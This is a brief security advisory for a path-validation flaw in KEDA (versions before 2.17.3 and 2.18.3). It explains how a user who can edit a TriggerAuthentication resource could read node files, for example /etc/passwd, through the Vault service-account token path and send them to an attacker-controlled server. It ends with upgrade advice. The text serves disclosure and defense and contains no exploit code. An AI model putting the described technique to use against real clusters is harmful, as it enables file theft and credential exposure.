CVE-2025-68476

Name of the Vulnerable Software and Affected Versions KEDA versions prior to 2.17.3 KEDA versions prior to 2.18.3

Description KEDA is a Kubernetes-based Event Driven Autoscaling component. A flaw exists in KEDA that could allow an attacker with permissions to create or modify a TriggerAuthentication resource to read arbitrary files from the node's filesystem where the KEDA pod resides. This is due to insufficient path validation when loading the Service Account Token specified in spec.hashiCorpVault.credential.serviceAccount. The attacker can direct the file's content to a server they control as part of the Vault authentication request, potentially exfiltrating sensitive system information like secrets, keys, or files such as /etc/passwd. This issue affects any KEDA resource using TriggerAuthentication with HashiCorp Vault authentication.

Recommendations Update KEDA to version 2.17.3 or later. Update KEDA to version 2.18.3 or later.